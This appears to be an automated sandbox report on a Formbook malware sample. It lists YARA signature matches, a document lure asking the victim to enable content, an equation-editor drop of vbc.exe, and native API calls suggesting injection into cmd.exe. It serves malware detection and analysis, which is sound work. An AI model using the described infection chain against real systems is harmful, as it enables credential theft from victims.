            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
            Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E18B04_2_002E18B0
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E03E44_2_002E03E4
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1BC24_2_002E1BC2
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E04A84_2_002E04A8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E07C64_2_002E07C6
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E08124_2_002E0812
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E19514_2_002E1951
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A504_2_002E9A50
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9CA94_2_002E9CA9
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9CB84_2_002E9CB8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E2CF84_2_002E2CF8
            Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0D114_2_002E0D11
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00901B104_2_00901B10
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C95A5_2_0041C95A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96E5_2_0041C96E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D1285_2_0041D128
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C38D5_2_0041C38D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BB9E5_2_0041BB9E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C905_2_00408C90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D8A5_2_00402D8A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF8B5_2_0041BF8B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE0C65_2_008EE0C6
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0091D0055_2_0091D005
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0090905A5_2_0090905A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F30405_2_008F3040
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EE2E95_2_008EE2E9
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009912385_2_00991238
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008EF3CF5_2_008EF3CF
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009163DB5_2_009163DB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F23055_2_008F2305
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F73535_2_008F7353
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0093A37B5_2_0093A37B
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009254855_2_00925485
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009014895_2_00901489
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0090C5F05_2_0090C5F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F351F5_2_008F351F
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F46805_2_008F4680
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FE6C15_2_008FE6C1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009926225_2_00992622
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0097579A5_2_0097579A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC7BC5_2_008FC7BC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0098F8EE5_2_0098F8EE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008FC85C5_2_008FC85C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0091286D5_2_0091286D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0099098E5_2_0099098E
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008F29B25_2_008F29B2
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009069FE5_2_009069FE
            Source: C:\Users\Public\vbc.exeCode function: 5_2_009759555_2_00975955
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A12387_2_022A1238
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FE2E97_2_021FE2E9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022023057_2_02202305
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0224A37B7_2_0224A37B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022073537_2_02207353
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A63BF7_2_022A63BF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FF3CF7_2_021FF3CF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022263DB7_2_022263DB
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222D0057_2_0222D005
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022030407_2_02203040
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221905A7_2_0221905A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FE0C67_2_021FE0C6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A26227_2_022A2622
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0224A6347_2_0224A634
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022046807_2_02204680
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220E6C17_2_0220E6C1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220C7BC7_2_0220C7BC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228579A7_2_0228579A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022357C37_2_022357C3
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228443E7_2_0228443E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0223D47D7_2_0223D47D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022354857_2_02235485
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022114897_2_02211489
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220351F7_2_0220351F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022465407_2_02246540
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221C5F07_2_0221C5F0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022B3A837_2_022B3A83
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02227B007_2_02227B00
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022ACBA47_2_022ACBA4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_021FFBD77_2_021FFBD7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228DBDA7_2_0228DBDA
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222286D7_2_0222286D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220C85C7_2_0220C85C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229F8EE7_2_0229F8EE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0228394B7_2_0228394B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022859557_2_02285955
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022029B27_2_022029B2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022A098E7_2_022A098E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_022169FE7_2_022169FE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02232E2F7_2_02232E2F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0221EE4C7_2_0221EE4C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02210F3F7_2_02210F3F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0222DF7C7_2_0222DF7C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229CFB17_2_0229CFB1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02272FDC7_2_02272FDC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02230D3B7_2_02230D3B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0220CD5B7_2_0220CD5B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_0229FDDD7_2_0229FDDD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DD1287_2_000DD128
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC38D7_2_000DC38D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC95A7_2_000DC95A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DC96E7_2_000DC96E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000DBB9E7_2_000DBB9E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C8C907_2_000C8C90
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2D8A7_2_000C2D8A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2D907_2_000C2D90
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_000C2FB07_2_000C2FB0
            Source: C:\Users\Public\vbc.exeCode function: String function: 0095F970 appears 49 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0093373B appears 148 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00933F92 appears 66 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 008EDF5C appears 71 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0226F970 appears 84 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 021FDF5C appears 119 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 021FE2A8 appears 38 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0224373B appears 245 times
            Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02243F92 appears 132 times
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418720 NtClose,5_2_00418720
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00418642 NtCreateFile,5_2_00418642
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041869D NtReadFile,5_2_0041869D
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004187CB NtAllocateVirtualMemory,5_2_004187CB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E00C4 NtCreateFile,LdrInitializeThunk,5_2_008E00C4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_008E0048
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E0078 NtResumeThread,LdrInitializeThunk,5_2_008E0078
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008E07AC NtCreateMutant,LdrInitializeThunk,5_2_008E07AC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF9F0 NtClose,LdrInitializeThunk,5_2_008DF9F0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DF900 NtReadFile,LdrInitializeThunk,5_2_008DF900
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_008DFAD0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_008DFAE8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_008DFBB8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_008DFB68
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_008DFC90
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFC60 NtMapViewOfSection,LdrInitializeThunk,5_2_008DFC60
            Source: C:\Users\Public\vbc.exeCode function: 5_2_008DFD8C NtDelayExecution,LdrInitializeThunk,5_2_008DFD8C
